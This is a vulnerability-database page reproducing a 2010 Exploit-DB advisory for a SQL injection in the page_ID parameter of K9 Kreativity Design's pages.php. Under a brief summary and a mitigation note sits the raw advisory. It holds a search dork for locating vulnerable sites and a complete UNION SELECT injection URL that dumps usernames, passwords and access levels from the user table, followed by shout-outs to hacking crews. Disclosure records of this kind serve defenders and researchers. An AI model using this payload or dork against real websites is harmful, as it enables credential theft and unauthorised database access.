header-logo
Suggest Exploit
vendor:
pages.php
by:
Newbie_Campuz
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: pages.php
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

K9 Kreativity Design (pages.php) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter page_ID. The malicious query can be sent via a GET request to the vulnerable parameter page_ID. The malicious query can be used to extract sensitive information from the database such as usernames, passwords, and user access levels.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

==========================================================
K9 Kreativity Design  (pages.php) SQL Injection Vulnerability
==========================================================

##########################################################
[+] K9 Kreativity Design (pages.php) SQL Injection Vulnerability
[+] By Newbie_Campuz
[+] Published: 2010-06-02 Pukul 21.00 WIB
[+] jatimcrew.org/
##########################################################

# Script Homepage:
# http://www.k9kreativity.co.uk/

[+]Dork: "pages.php?page_ID=" "K9 Kreativity"

[+] SQL Injection


	http://[target]/pages.php?page_ID=[SQL]

	http://[target]/pages.php?page_ID=-9999%20union%20select%201,2,3,4,5,6,7,8,9,group_concat(username,0x3a,password,0x3a,user_accesslevel),11,12,13,14,15,16%20from%20user--

##########################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to : 	
My Parent, My Brother n My Sister
Byz9991, Doraemon, Bang_Napi, Dark_anvanger, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, phoenixhaxor, mywisdom, 
Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, inurl, Osean, Vhacx, jamsh0ut, elfata, vickry_shahab
cybermuttaqin, k3m4ngi, roentah, zhombhie, techno_x46 and YOU... !!!

All admin, momod, spamguard, staff and member Jatim Crew..
All admin, momod, spamguard, staff and member xteamweb
All admin, momod, spamguard, staff and member h2ozones

##########################################################